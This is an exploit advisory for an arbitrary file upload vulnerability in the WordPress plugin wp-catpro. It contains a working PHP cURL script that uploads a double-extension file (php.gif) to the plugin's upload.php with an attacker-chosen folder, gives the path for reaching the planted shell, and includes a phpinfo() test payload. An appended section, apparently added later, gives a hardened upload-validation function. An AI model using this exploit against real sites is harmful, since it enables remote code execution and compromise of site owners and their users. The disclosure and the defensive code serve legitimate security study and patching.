WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7, Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif: only the final extension is compared against the whitelist below, so a double extension passes
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the pre-PHP 5.5 cURL file-upload syntax (later replaced by CURLFile)
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile",
          'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif

<?php
phpinfo();
?>
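A hardened replacement for the extension check quoted in the exploit info section, added here as an example (not code from the advisory or from the wp-catpro plugin). The function name validate_image_upload() and the upload-handler usage at the bottom are assumptions; the extension whitelist is the plugin's own.

```php
<?php
// Added example, not wp-catpro code: validate an upload so that a double
// extension such as "shell.php.gif" is rejected and the client never
// controls the stored file name or the destination folder.

// The plugin's whitelist ("jpg", "gif", "png"), paired with the MIME type
// each extension must actually contain.
const ALLOWED_IMAGE_TYPES = [
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
    'png' => 'image/png',
];

/**
 * Returns a server-chosen file name for a valid image upload, or null if the
 * upload must be rejected. (Assumed helper name.)
 *
 * @param string $tmpPath    temp file path, e.g. $_FILES['Filedata']['tmp_name']
 * @param string $clientName file name supplied by the client
 */
function validate_image_upload(string $tmpPath, string $clientName): ?string
{
    $base = basename($clientName);

    // Match the WHOLE name: exactly one dot, then a whitelisted extension.
    // "shell.php.gif" passes a last-extension check but fails here, and no
    // inner ".php" component is left for multi-extension handlers to execute.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(jpg|gif|png)\z/i', $base)) {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));

    // Defence in depth only: sniff the bytes instead of trusting the client's
    // Content-Type. The name check above is what prevents execution.
    if (!is_uploaded_file($tmpPath)) {
        return null;
    }
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected !== ALLOWED_IMAGE_TYPES[$ext]) {
        return null;
    }

    // Random server-side name; the original name is never written to disk.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Assumed handler usage: the request's 'folder' parameter is ignored and the
// destination is fixed server-side; authorize the caller first (in WordPress,
// e.g. current_user_can('upload_files')).
// $name = validate_image_upload($_FILES['Filedata']['tmp_name'], $_FILES['Filedata']['name']);
// if ($name === null) { http_response_code(400); exit; }
// move_uploaded_file($_FILES['Filedata']['tmp_name'], UPLOAD_DIR . '/' . $name);
```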